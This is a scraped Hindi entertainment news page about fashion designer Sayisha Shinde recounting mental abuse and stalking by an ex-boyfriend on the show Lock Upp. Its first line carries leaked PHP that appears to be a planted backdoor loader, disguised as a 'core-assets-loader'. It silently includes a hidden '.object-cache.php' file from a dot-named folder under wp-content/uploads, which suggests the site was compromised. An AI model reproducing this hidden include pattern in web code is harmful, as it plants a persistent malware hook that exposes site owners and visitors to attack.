add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Lock Upp: “वह मुझपर नजर रखता था, छत पर चढ़कर बाथरूम में झांकता था”; सायाश शिंदे ने अपने बॉयफ्रेंड को लेकर किया खुलासा – SOCH INDIA
Menu

Lock Upp: “वह मुझपर नजर रखता था, छत पर चढ़कर बाथरूम में झांकता था”; सायाश शिंदे ने अपने बॉयफ्रेंड को लेकर किया खुलासा

nobanner

लॉकअप के हालिया एपिसोड में सायशा शिंदे, पायल रोहतगी और पूनम पांडे ने एक-दूसरे के साथ अपने निजी जीवन की कुछ कड़वी यादें साझा कीं। पूनम ने जहां अपने पति सैम बॉम्बे पर घरेलू शोषण का आरोप लगाया, वहीं सायशा शिंदे ने भी अपने निजी जीवन से ऐसा ही अनुभव साझा किया।

सायशा शिंदे, जो सेक्स रिअसाइनमेंट सर्जरी से पहले स्वप्निल थीं, वह एक लड़के के साथ रिश्ते में थी। सायशा बताती हैं कि उनके एक्स बॉयफ्रेंड ने उन्हें मानसिक रूप से प्रताड़ित किया था। अनुभव को याद करते हुए, सायशा कहती हैं, “मेरे साथ दुर्व्यवहार किया गया था, लेकिन यह शारीरिक नहीं था, यह मानसिक शोषण था। उसने मुझे ऐसा महसूस कराया कि मैं कोई गंदगी हूं। वह मेरे दरवाजे के बाहर खड़ा रहता था और इंतजार करता था कि कब कोई आएगा और वह मुझे धोखा देते हुए रंगे हाथों पकड़ लेगा। वह छत पर चढ़ता था और पाइपलाइन पर खड़े होकर बाथरूम के अंदर झांकता था। वह मन ही मन सोचता रहता था कि मैं उसको धोखा दे रही हूं। इसलिए मेरे खिलाफ सबूत ढूंढ़ता रहता था।

बता दें कि सायशा शिंदे एक प्रसिद्ध फैशन डिजाइनर हैं। उन्होंने कुछ लोकप्रिय बॉलीवुड हस्तियों जैसे कंगना रणौत, करीना कपूर खान और कई अन्य को स्टाइल किया है। उन्होंने हरनाज़ कौर संधू के लिए मिस यूनिवर्स फिनाले 2021 का गाउन भी डिजाइन किया था।